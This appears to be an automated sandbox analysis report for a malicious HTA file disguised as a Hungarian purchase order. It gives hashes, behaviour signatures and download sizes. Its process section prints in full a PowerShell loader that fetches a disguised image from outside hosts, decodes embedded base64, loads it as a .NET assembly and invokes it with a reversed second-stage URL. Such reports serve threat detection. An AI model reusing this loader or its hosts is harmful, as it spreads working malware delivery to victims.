Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
12-02-2024 17:57
General
-
Target
Rendelés_(PO5042208)_Az Idumont.hta
-
Size
9KB
-
MD5
0766fff13fcd69232a01442507c7faaf
-
SHA1
e559fef859f0da7dbb27ee0ee81b68f759b8772a
-
SHA256
5f86822a5a049aaa09d6f11ad557f4c2ae8ce57b37daa6b00658fff4ee1ce090
-
SHA512
ae8bc05b1233b8495f18a3f11ebbd2a5e2ad8345b3eed593ef4885a76eff74fa5f9a11f150b087dfea1fba9a29d0ae8ac8107d7da5de7e5abdf848a1c8b68988
-
SSDEEP
192:sv0r6VP2SMNXVBVLkC6YWILLDFDNk6cl26nWc8t9embQV:sv0rwQvDwhMDxNkmV9embm
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Rendelés_(PO5042208)_Az Idumont.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/999/original/new_image.jpg?1707144651', 'http://45.74.19.84/xampp/bkp/bkp_hta.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('w5x8fgEv-w5YOBA!=yekhtua&99212%420139D0B4D360A9=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'C:\ProgramData\' , 'Name'))}}2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
344B
MD5212eda6bc96a69d7732429f99c69ea05
SHA12737ee189c8183d15af83a1cae2413e19e48a8b5
SHA2561391b50540bcba7e204576203c8aff153dae638ff10b15bf65af12b7fc3cccca
SHA512267fb96a0b1c6d28dea53de652944f3b9e988291e8653a2a8607a7714bcf769ce7e1b6efb6a11d50facc5316ccbd7f30a63440ab219c8fd293a663c5d2e68227
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB